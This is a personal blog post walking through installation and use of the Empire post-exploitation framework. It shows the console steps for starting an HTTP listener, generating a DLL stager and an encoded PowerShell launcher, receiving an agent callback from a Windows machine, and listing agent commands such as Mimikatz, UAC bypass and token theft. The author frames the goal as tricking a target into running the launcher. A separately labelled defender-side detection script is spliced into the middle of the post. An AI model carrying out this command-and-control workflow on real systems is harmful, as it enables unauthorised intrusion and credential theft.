休止千鹤 | I am still just an ordinary student
This post comes from my old blog, May 2017. Things may have changed since. At the time the system's built-in Python was Python 2.7 by default; while tidying it up I made some changes to the wording of the original.
This was shortly after MS17010. Empire combined with the MS17010 exploit let me get through quite a few internal networks back then (scriptkid). This article, however, is only an install-and-try introduction.
Note: times have changed. I just read the comments, went to look at the Empire project and found that it is no longer being updated.
It was just a few days ago. After finishing a heap of things (installing msf on the rpi and configuring its database, messing with NFC for the canteen card, and so on), I stumbled on a great tool: Empire.
It does a great deal purely with PowerShell to avoid detection; it can log keystrokes, and Mimikatz is built in too. A very impressive framework.
(This post is an install-and-try introduction; experienced folks can close it and save their precious time for learning something else.)
So today let's install it and see how it is used to attack.
Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.
↑ Image linked from the official site. Looks cool, doesn't it?
This is of course installed on the Raspberry Pi again; after all, it is the only thing that counts as a decent energy-saving server. Yes, still osmc, which has now become a pentesting tool. (Aside: I recently picked up an orange pi and plan to turn it into a portable pentesting rig. If it works out I may write about that too.)
(Skip this section if you already have it installed.)
The official site redirects straight to github.
git clone https://github.com/EmpireProject/Empire.git
cd Empire/
cd setup/
./install.sh
[!] This script must be run as root
// 233
sudo ./install.sh
Back in the parent directory, running ./empire went wrong: OpenSSL was missing. pip install, and then pip itself errored out (for no obvious reason):
Traceback (most recent call last):
  File "/usr/bin/pip", line 9, in <module>
    load_entry_point('pip==1.5.6', 'console_scripts', 'pip')()
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 356, in load_entry_point
    return get_distribution(dist).load_entry_point(group, name)
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 2476, in load_entry_point
    return ep.load()
  File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 2190, in load
    ['__name__'])
  File "/usr/lib/python2.7/dist-packages/pip/__init__.py", line 74, in <module>
    from pip.vcs import git, mercurial, subversion, bazaar  # noqa
  File "/usr/lib/python2.7/dist-packages/pip/vcs/mercurial.py", line 9, in <module>
    from pip.download import path_to_url
  File "/usr/lib/python2.7/dist-packages/pip/download.py", line 25, in <module>
    from requests.compat import IncompleteRead
ImportError: cannot import name IncompleteRead
(Tidied up again in 2021; there was far too much rambling back then.)
Reinstalling pip fixed it.
And install the dependencies while we are at it:
sudo apt-get remove python-pip
sudo apt-get autoremove
sudo easy_install pip
sudo pip install pyopenssl netifaces zlib-wrapper
Then Empire finally started. To be exact, Empire 2.0.
================================================================
[Empire] Post-Exploitation Framework
================================================================
[Version] 2.0 | [Web] https://theempire.io
================================================================
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|
267 modules currently loaded
0 listeners currently active
0 agents currently active
(Empire) >
Since this is 2.0, operation differs from earlier versions; I fumbled around for quite a while.
Listeners here are the same thing as MSF listeners. Agents correspond to MSF sessions. Once these basic concepts are straight, the rest is easy.
Our goal: have the Rpi open a listener over HTTP, then generate a dll payload and a powershell command, and trick the target into executing it (a Badusb would also do; in short, a command has to be executed).
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > help
Listener Commands
=================
agents Jump to the Agents menu.
back Go back to the main menu.
exit Exit Empire.
help Displays the help menu.
info Display information for the given active listener.
kill Kill one or all active listeners.
launcher Generate an initial launcher for a listener.
list List all active listeners (or agents).
main Go back to the main menu.
uselistener Use an Empire listener module.
usestager Use an Empire stager.
(Empire: listeners) > uselistener
dbx http http_com http_foreign http_hop meterpreter
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
Name: HTTP[S]
Category: client_server
Authors:
@harmj0y
Description:
Starts a http[s] listener (PowerShell or Python) that uses a
GET/POST approach.
HTTP[S] Options:
Name Required Value Description
---- -------- ------- -----------
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -w 1 -enc Launcher string.
DefaultLostLimit True 60 Number of missed checkins before exiting
StagingKey True NLgp2rGjSu}k%RlUc*{zF:aKDCn[qev~ Staging key for initial agent negotiation.
BindIP True 0.0.0.0 The IP to bind to on the control server.
DefaultProfile True /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Default communication profile for the agent.
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
WorkingHours False Hours for the agent to operate (09:00-17:00).
Host True http://192.168.0.101:89 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
Port True 89 Port for the listener.
(Empire: listeners/http) > set Name HttpListener
(Empire: listeners/http) > execute
[*] Starting listener 'HttpListener'
[+] Listener successfully started!
(Empire: listeners/http) >;
A main command to get back.
(Tidying note: what the commands mean)
usestager windows/ lists the payloads available for Windows.
I used dll here.
Use the info command to view the payload's details. set Listener HttpListener sets the listener to call back to.
set Arch x86 sets the architecture; my machine is pretty old, 32-bit, so x86.
execute runs it.
================================================================
[Empire] Post-Exploitation Framework
================================================================
[Version] 2.0 | [Web] https://theempire.io
================================================================
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|
267 modules currently loaded
1 listeners currently active
0 agents currently active
(Empire) > usestager windows/
bunny dll ducky hta launcher_bat launcher_sct launcher_vbs macro teensy
(Empire) > usestager windows/dll
(Empire: stager/windows/dll) > info
Name: DLL Launcher
Description:
Generate a PowerPick Reflective DLL to inject with
stager code.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True http Listener to use.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
Language True powershell Language of the stager to generate.
OutFile True /tmp/launcher.dll File to output dll to.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Arch True x86 Architecture of the .dll to generate
(x64 or x86).
StagerRetries False 0 Times for the stager to retry
connecting.
(Empire: stager/windows/dll) > set Listener HttpListener
(Empire: stager/windows/dll) > set Arch x86
(Empire: stager/windows/dll) > execute
[*] Stager output written out to: /tmp/launcher.dll
(Empire: stager/windows/dll) > listeners
[*] Active listeners:
Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
HttpListener http http://192.168.0.101:89 5/0.0
(Empire: listeners) > launcher powershell HttpListener
powershell -noP -w 1 -enc ...
(Empire: listeners) > [+] Initial agent 1R8T9BNA from 192.168.0.100 now active
(Empire: listeners) > agents
[*] Active agents:
Name Lang Internal IP Machine Name Username Process Delay Last Seen
--------- ---- ----------- ------------ --------- ------- ----- --------------------
1R8T9BNA ps 192.168.1.133 DESKTOP-NO77T28 DESKTOP-NO77T28\restpowershell/4060 5/0.0 2017-05-21 20:14:12
(Empire: agents) >
Then we throw the big blob just generated into a cmd window and run it. (My Huorong popped up a block, saying powershell wanted network access.) An agent came back, and the cmd window flashed and vanished.
That is equivalent to getting a session like in MSF.
There are still some problems; I will just paste two info outputs for you to look at.
Commands take a very long time to execute, I don't know why. Listing directories in particular got almost no response. Privilege escalation did not succeed.
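From the defender's side, the listener options and the generated launcher above leave two recognisable traces: the `powershell -noP -w 1 -enc <base64>` command line, and check-ins to the DefaultProfile URIs with the Trident User-Agent, the fake Microsoft-IIS/7.5 Server header and a fixed 5-second delay with 0.0 jitter. The following is an added example (not from the original post or the Empire project) that checks for both; the log lines and their field order are constructed assumptions.

```python
"""Added example, not from the original post or Empire: defender-side checks for the
launcher shape and the default HTTP profile shown in this walkthrough (constructed samples)."""
import base64
import re
from collections import defaultdict

# Values copied from the listener's DefaultProfile and ServerVersion options above.
PROFILE_URIS = {"/admin/get.php", "/news.php", "/login/process.php"}
PROFILE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
PROFILE_SERVER = "Microsoft-IIS/7.5"
LAUNCHER_RE = re.compile(r"powershell(?:\.exe)?\s+-noP\s+-w\s+1\s+-enc\s+([A-Za-z0-9+/=]+)", re.I)

def decode_launcher(cmdline):
    """If a process command line has the launcher shape, return the decoded script for
    analyst review (the -enc argument is base64 over a UTF-16LE script); otherwise None."""
    m = LAUNCHER_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def find_beacons(lines, min_hits=3):
    """Return {src_ip: interval} for clients hitting the profile URIs with the profile
    User-Agent and Server header at one fixed interval (DefaultDelay 5, DefaultJitter 0.0).
    Constructed line format: epoch<TAB>src_ip<TAB>uri<TAB>user_agent<TAB>server_header."""
    times = defaultdict(list)
    for line in lines:
        ts, src, uri, ua, server = line.rstrip("\n").split("\t")
        if uri in PROFILE_URIS and ua == PROFILE_UA and server == PROFILE_SERVER:
            times[src].append(int(ts))
    beacons = {}
    for src, ts in times.items():
        ts.sort()
        gaps = {b - a for a, b in zip(ts, ts[1:])}
        if len(ts) >= min_hits and len(gaps) == 1:  # zero jitter: a single distinct gap
            beacons[src] = gaps.pop()
    return beacons

# Constructed samples: the encoded script is benign, only the launcher shape matters.
SAMPLE_CMDLINE = "powershell -noP -w 1 -enc " + base64.b64encode(
    "Write-Host 'constructed sample'".encode("utf-16le")).decode()
SAMPLE_LOG = [
    "1495368846\t192.168.1.133\t/admin/get.php\t%s\t%s" % (PROFILE_UA, PROFILE_SERVER),
    "1495368851\t192.168.1.133\t/news.php\t%s\t%s" % (PROFILE_UA, PROFILE_SERVER),
    "1495368856\t192.168.1.133\t/login/process.php\t%s\t%s" % (PROFILE_UA, PROFILE_SERVER),
    "1495368858\t192.168.1.50\t/news.php\tMozilla/5.0 (X11; Linux x86_64)\tnginx",  # normal browsing
]
```

Against the constructed log, `find_beacons(SAMPLE_LOG)` returns `{'192.168.1.133': 5}`; a non-default profile or a non-zero jitter would need the URI/UA set and the gap test widened accordingly.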
(Empire: listeners) > agents
[*] Active agents:
Name Lang Internal IP Machine Name Username Process Delay Last Seen
--------- ---- ----------- ------------ --------- ------- ----- --------------------
1R8T9BNA ps 192.168.1.133 DESKTOP-NO77T28 DESKTOP-NO77T28\restpowershell/4060 5/0.0 2017-05-21 20:14:12
(Empire: agents) > help
Commands
========
back Go back to the main menu.
clear Clear one or more agent's taskings.
creds Display/return credentials from the database.
exit Exit Empire.
help Displays the help menu.
interact Interact with a particular agent.
kill Task one or more agents to exit.
killdate Set the killdate for one or more agents (killdate [agent/all] 01/01/2016).
list Lists all active agents (or listeners).
listeners Jump to the listeners menu.
lostlimit Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '
main Go back to the main menu.
remove Remove one or more agents from the database.
rename Rename a particular agent.
searchmodule Search Empire module names/descriptions.
sleep Task one or more agents to 'sleep [agent/all] interval [jitter]'
usemodule Use an Empire PowerShell module.
usestager Use an Empire stager.
workinghours Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00).
(Empire: agents) > interact 1R8T9BNA
(Empire: 1R8T9BNA) > help
Agent Commands
==============
agents Jump to the Agents menu.
back Go back a menu.
bypassuac Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear Clear out agent tasking.
creds Display/return credentials from the database.
download Task an agent to download a file.
exit Task agent to exit.
help Displays the help menu or syntax for particular commands.
info Display information about this agent
injectshellcode Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs Return jobs or kill a running job.
kill Task an agent to kill a particular process name or ID.
killdate Get or set an agent's killdate (01/01/2016).
list Lists all active agents (or listeners).
listeners Jump to the listeners menu.
lostlimit Task an agent to change the limit on lost agent detection
main Go back to the main menu.
mimikatz Runs Invoke-Mimikatz on the client.
psinject Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>
pth Executes PTH for a CredID through Mimikatz.
rename Rename the agent.
revtoself Uses credentials/tokens to revert token privileges.
sc Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd Execute a function in the currently imported PowerShell script.
scriptimport Imports a PowerShell script and keeps it in memory in the agent.
searchmodule Search Empire module names/descriptions.
shell Task an agent to use a shell command.
sleep Task an agent to 'sleep interval [jitter]'
spawn Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo Task an agent to get system information.
updateprofile Update an agent connection profile.
upload Task an agent to upload a file.
usemodule Use an Empire PowerShell module.
workinghours Get or set an agent's working hours (9:00-17:00).
(Empire: 1R8T9BNA) > sysinfo
(Empire: 1R8T9BNA) > sysinfo: 0|http://192.168.0.101:89|DESKTOP-NO77T28|rest|DESKTOP-NO77T28|192.168.1.133|Microsoft Windows 10 教育版|False|powershell|4060|powershell|5
(Empire: 1R8T9BNA) > info
[*] Agent info:
nonce 7085646166885544
jitter 0.0
servers None
internal_ip 192.168.1.133
working_hours
session_key bYy3w$)K`>-.Jj;&@vEDSaMP|meFZT(!
children None
checkin_time 2017-05-21 20:14:06
hostname DESKTOP-NO77T28
id 1
delay 5
username DESKTOP-NO77T28\rest
kill_date
parent None
process_name powershell
listener HttpListener
process_id 4060
profile /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT
6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
os_details Microsoft Windows 10 ???
lost_limit 60
taskings
name 1R8T9BNA
language powershell
external_ip 192.168.0.100
session_id 1R8T9BNA
lastseen_time 2017-05-21 20:18:37
language_version 5
high_integrity 0
(Empire: 1R8T9BNA) >
Comments
lee:
This article was just written, so why not install the latest version? The latest Empire is 2.5.
restkhz (admin):
sec:
I am having trouble downloading it. Could you send a copy of Empire to my email? Many thanks.
restkhz (admin):